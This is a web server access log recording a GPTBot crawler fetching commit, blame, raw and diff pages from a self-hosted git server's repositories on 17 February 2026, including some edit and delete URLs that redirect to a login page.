"https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/63aec54418d3c1735d68bf046c7a9e78a247798d/html/status.json" -[17/Feb/2026:15:05:27 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/63aec54418d3c1735d68bf046c7a9e78a247798d/html/metadata.json?display=source" [Client 74.7.227.38] [Length 11283] [Gzip 3.02] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/63aec54418d3c1735d68bf046c7a9e78a247798d/html/metadata.json" -[17/Feb/2026:15:05:28 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/fd51c36120e0bc559f08a35a65c69351c564222a/html/assets/images/honeywell-logo.svg?display=source" [Client 74.7.227.38] [Length 13903] [Gzip 2.80] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/fd51c36120e0bc559f08a35a65c69351c564222a/html/assets/images/honeywell-logo.svg" -[17/Feb/2026:15:05:28 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/C++Project/industrial-comm/src-old" [Client 74.7.227.38] [Length 10418] [Gzip 3.35] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/C++Project/industrial-comm" -[17/Feb/2026:15:05:29 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/1ba28dbce67b92a8a16ef4e5a21db13fbfa229fa/.TemporaryDocument/assetpilot.ico?display=rendered" [Client 74.7.227.38] [Length 10841] [Gzip 2.95] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/1ba28dbce67b92a8a16ef4e5a21db13fbfa229fa/.TemporaryDocument/assetpilot.ico" -[17/Feb/2026:15:05:29 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/9374d883a61b35708b6c621337a654b11bcdb426/PythonTest/my_database.db" [Client 74.7.227.38] [Length 14348] [Gzip 27.36] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9374d883a61b35708b6c621337a654b11bcdb426/PythonTest/my_database.db" -[17/Feb/2026:15:05:30 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commit/63aec54418d3c1735d68bf046c7a9e78a247798d?files=html%2fassets%2fjs%2fscript.js" [Client 74.7.227.38] [Length 19245] [Gzip 3.34] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/commits/commit/63aec54418d3c1735d68bf046c7a9e78a247798d/html/assets/js/script.js" -[17/Feb/2026:15:05:31 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec?files=html%2fassets%2fjs%2fi18n.js" [Client 74.7.227.38] [Length 36952] [Gzip 7.38] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/commits/commit/b288a964d15beae093be1af2456d67149d3aafa1/html/assets/js/i18n.js" -[17/Feb/2026:15:05:31 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/homepage/_edit/.Backup/html/README.md" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/90c7377285c0e63de46467557a2f081b33097f03/.Backup/html" -[17/Feb/2026:15:05:31 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4849] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/_edit/.Backup/html/README.md" -[17/Feb/2026:15:05:32 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/C++Project/.vscode" [Client 74.7.227.38] [Length 10139] [Gzip 2.84] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/C++Project" -[17/Feb/2026:15:05:32 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977/C++Project/TestProject/build/CMakeFiles/TestApp.dir/progress.make" [Client 74.7.227.38] [Length 9955] [Gzip 2.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977/C++Project/TestProject/build/CMakeFiles/TestApp.dir/progress.make" -[17/Feb/2026:15:05:33 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977/C++Project/TestProject/build/CMakeFiles/TestApp.dir/progress.make" [Client 74.7.227.38] [Length 10180] [Gzip 3.03] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977/C++Project/TestProject/build/CMakeFiles/TestApp.dir/progress.make" -[17/Feb/2026:15:05:33 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977/C++Project/TestProject/build/CMakeFiles/TestApp.dir/progress.make" [Client 74.7.227.38] [Length 43] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977/C++Project/TestProject/build/CMakeFiles/TestApp.dir/progress.make" -[17/Feb/2026:15:05:34 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/48e58ba35a3d0cdc46729773d610323f6cca6b3a/C++Project" [Client 74.7.227.38] [Length 9893] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/48e58ba35a3d0cdc46729773d610323f6cca6b3a/C++Project" -[17/Feb/2026:15:05:35 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/C++Project/industrial-comm/src-old" [Client 74.7.227.38] [Length 9960] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/C++Project/industrial-comm/src-old" -[17/Feb/2026:15:05:35 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/commit/adf9a81cb0ea52c9fa32f352b5800e021665bb47?files=.TemporaryDocument%2fmain.py.good2" [Client 74.7.227.38] [Length 28677] [Gzip 7.68] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/commits/commit/adf9a81cb0ea52c9fa32f352b5800e021665bb47/.TemporaryDocument/main.py.good2" -[17/Feb/2026:15:05:36 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/commit/adf9a81cb0ea52c9fa32f352b5800e021665bb47?files=.TemporaryDocument%2fapp.js.good2" [Client 74.7.227.38] [Length 30841] [Gzip 8.48] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/commits/commit/adf9a81cb0ea52c9fa32f352b5800e021665bb47/.TemporaryDocument/app.js.good2" -[17/Feb/2026:15:05:36 +0000] - 404 404 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commit/%7Bservice.image%7D" [Client 74.7.227.38] [Length 11] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/commit/ebd2be03a23e76e126207d40a257d72f40ab9a7c.diff" -[17/Feb/2026:15:05:37 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/commits/commit/3181052619700dceeeef81a9a0851130498f177e/.vscode/settings.json" [Client 74.7.227.38] [Length 9868] [Gzip 2.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/src/commit/3181052619700dceeeef81a9a0851130498f177e/.vscode/settings.json" -[17/Feb/2026:15:05:37 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commit/ebd2be03a23e76e126207d40a257d72f40ab9a7c?files=html%2fcomponents%2fFooter.tsx" [Client 74.7.227.38] [Length 26203] [Gzip 5.25] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/commits/commit/90c7377285c0e63de46467557a2f081b33097f03/html/components/Footer.tsx" -[17/Feb/2026:15:05:38 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/C++Project/.vscode" [Client 74.7.227.38] [Length 9912] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/C++Project/.vscode" -[17/Feb/2026:15:05:38 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commit/ebd2be03a23e76e126207d40a257d72f40ab9a7c?files=html%2fcomponents%2fAbout.tsx" [Client 74.7.227.38] [Length 25856] [Gzip 4.74] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/commits/commit/90c7377285c0e63de46467557a2f081b33097f03/html/components/About.tsx" -[17/Feb/2026:15:05:39 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commit/ebd2be03a23e76e126207d40a257d72f40ab9a7c?files=html%2fcomponents%2fHeader.tsx" [Client 74.7.227.38] [Length 26852] [Gzip 5.31] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/commits/commit/90c7377285c0e63de46467557a2f081b33097f03/html/components/Header.tsx" -[17/Feb/2026:15:05:40 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commit/ebd2be03a23e76e126207d40a257d72f40ab9a7c?files=html%2fcomponents%2fHero.tsx" [Client 74.7.227.38] [Length 25810] [Gzip 4.67] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/commits/commit/90c7377285c0e63de46467557a2f081b33097f03/html/components/Hero.tsx" -[17/Feb/2026:15:05:40 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/63aec54418d3c1735d68bf046c7a9e78a247798d/.Backup/html/index.html" [Client 74.7.227.38] [Length 21812] [Gzip 6.72] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/63aec54418d3c1735d68bf046c7a9e78a247798d/.Backup/html" -[17/Feb/2026:15:05:41 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/branch/main/git%20%EC%84%9C%EB%B2%84%20%EC%82%AC%EC%9A%A9%EB%B2%95%20%EB%8C%80%ED%99%94%20%EB%B3%B4%EA%B4%80/git%20sever%20%EA%B0%9C%EC%84%A4%20%EA%B4%80%EB%A0%A8%20%EB%8C%80%ED%99%94.md" [Client 74.7.227.38] [Length 10888] [Gzip 4.14] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/git%20%EC%84%9C%EB%B2%84%20%EC%82%AC%EC%9A%A9%EB%B2%95%20%EB%8C%80%ED%99%94%20%EB%B3%B4%EA%B4%80/git%20sever%20%EA%B0%9C%EC%84%A4%20%EA%B4%80%EB%A0%A8%20%EB%8C%80%ED%99%94.md" -[17/Feb/2026:15:05:41 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/66e18d23c91cd4d290b6cecfdc88680af2fb97e2/.Backup/status.json" [Client 74.7.227.38] [Length 9879] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/66e18d23c91cd4d290b6cecfdc88680af2fb97e2/.Backup/status.json" -[17/Feb/2026:15:05:42 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commit/fd51c36120e0bc559f08a35a65c69351c564222a?files=.Backup%2fhtml%2fassets%2fimages%2fBatchControl.png" [Client 74.7.227.38] [Length 19812] [Gzip 3.44] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/commits/commit/fd51c36120e0bc559f08a35a65c69351c564222a/.Backup/html/assets/images/BatchControl.png" -[17/Feb/2026:15:05:42 +0000] - 404 404 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commit/assets/js/script.js" [Client 74.7.227.38] [Length 11] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/commit/fd51c36120e0bc559f08a35a65c69351c564222a.diff" -[17/Feb/2026:15:05:43 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/branch/main/.gitignore" [Client 74.7.227.38] [Length 11183] [Gzip 2.97] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage" -[17/Feb/2026:15:05:44 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/branch/main/nginx.conf" [Client 74.7.227.38] [Length 12206] [Gzip 3.38] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage" -[17/Feb/2026:15:05:44 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/commit/bf87175f515287fd25d175843915ffa6178025eb?files=asset_pilot_docker%2f.venv%2flib64" [Client 74.7.227.38] [Length 23584] [Gzip 3.46] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/commits/commit/fc1462a3f3e004bb33b52808fd01df2dfdbf79d3/asset_pilot_docker/.venv/lib64" -[17/Feb/2026:15:05:45 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/C++Project/controller-next-todo.md" [Client 74.7.227.38] [Length 11757] [Gzip 3.22] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/C++Project" -[17/Feb/2026:15:05:46 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commit/fd51c36120e0bc559f08a35a65c69351c564222a?files=.Backup%2fhtml%2fassets" [Client 74.7.227.38] [Length 55878] [Gzip 8.59] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/commits/commit/fd51c36120e0bc559f08a35a65c69351c564222a/.Backup/html/assets" -[17/Feb/2026:15:05:46 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/90c7377285c0e63de46467557a2f081b33097f03/html/.gitignore?display=rendered" [Client 74.7.227.38] [Length 10866] [Gzip 2.96] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/90c7377285c0e63de46467557a2f081b33097f03/html/.gitignore" -[17/Feb/2026:15:05:47 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/63aec54418d3c1735d68bf046c7a9e78a247798d/.Backup/html/index.html" [Client 74.7.227.38] [Length 9874] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/63aec54418d3c1735d68bf046c7a9e78a247798d/.Backup/html/index.html" -[17/Feb/2026:15:05:47 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/blame/commit/63aec54418d3c1735d68bf046c7a9e78a247798d/.Backup/html/index.html" [Client 74.7.227.38] [Length 23743] [Gzip 11.82] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/63aec54418d3c1735d68bf046c7a9e78a247798d/.Backup/html/index.html" -[17/Feb/2026:15:05:48 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/commit/63aec54418d3c1735d68bf046c7a9e78a247798d/.Backup/html/index.html" [Client 74.7.227.38] [Length 17807] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/63aec54418d3c1735d68bf046c7a9e78a247798d/.Backup/html/index.html" -[17/Feb/2026:15:05:48 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/90c7377285c0e63de46467557a2f081b33097f03/html/types.ts?display=rendered" [Client 74.7.227.38] [Length 10867] [Gzip 2.95] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/90c7377285c0e63de46467557a2f081b33097f03/html/types.ts" -[17/Feb/2026:15:05:50 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commit/ebd2be03a23e76e126207d40a257d72f40ab9a7c?show-outdated=&style=split&whitespace=show-all" [Client 74.7.227.38] [Length 204145] [Gzip 13.70] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/commit/ebd2be03a23e76e126207d40a257d72f40ab9a7c" -[17/Feb/2026:15:05:50 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/homepage/_delete/main/.gitignore" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/branch/main/.gitignore" -[17/Feb/2026:15:05:51 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4849] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/_delete/main/.gitignore" -[17/Feb/2026:15:05:51 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/homepage/_delete/main/nginx.conf" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/branch/main/nginx.conf" -[17/Feb/2026:15:05:51 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4849] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/_delete/main/nginx.conf" -[17/Feb/2026:15:05:51 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/branch/main/nginx.conf" [Client 74.7.227.38] [Length 10048] [Gzip 3.18] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/branch/main/nginx.conf" -[17/Feb/2026:15:05:52 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/C++Project/controller-next-todo.md" [Client 74.7.227.38] [Length 9956] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/C++Project/controller-next-todo.md" -[17/Feb/2026:15:05:52 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/branch/main/.gitignore" [Client 74.7.227.38] [Length 9811] [Gzip 2.87] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/branch/main/.gitignore" -[17/Feb/2026:15:05:53 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/homepage/_edit/main/nginx.conf" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/branch/main/nginx.conf" -[17/Feb/2026:15:05:53 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4849] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/_edit/main/nginx.conf" -[17/Feb/2026:15:05:53 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/homepage/_edit/main/.gitignore" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/branch/main/.gitignore" -[17/Feb/2026:15:05:54 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4849] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/_edit/main/.gitignore" -[17/Feb/2026:15:05:54 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/blame/branch/main/.gitignore" [Client 74.7.227.38] [Length 10239] [Gzip 2.89] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/branch/main/.gitignore" -[17/Feb/2026:15:05:55 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/rss/branch/main/.gitignore" [Client 74.7.227.38] [Length 898] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/branch/main/.gitignore" -[17/Feb/2026:15:05:55 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/branch/main/.gitignore" [Client 74.7.227.38] [Length 28] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/branch/main/.gitignore" -[17/Feb/2026:15:05:56 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/branch/main/nginx.conf" [Client 74.7.227.38] [Length 796] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/branch/main/nginx.conf" -[17/Feb/2026:15:05:56 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/rss/branch/main/nginx.conf" [Client 74.7.227.38] [Length 1476] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/branch/main/nginx.conf" -[17/Feb/2026:15:05:57 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/C++Project/controller-next-todo.md" [Client 74.7.227.38] [Length 1924] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/C++Project/controller-next-todo.md" -[17/Feb/2026:15:05:57 +0000] - 200 200 - GET https git.hanmocnn.co.kr 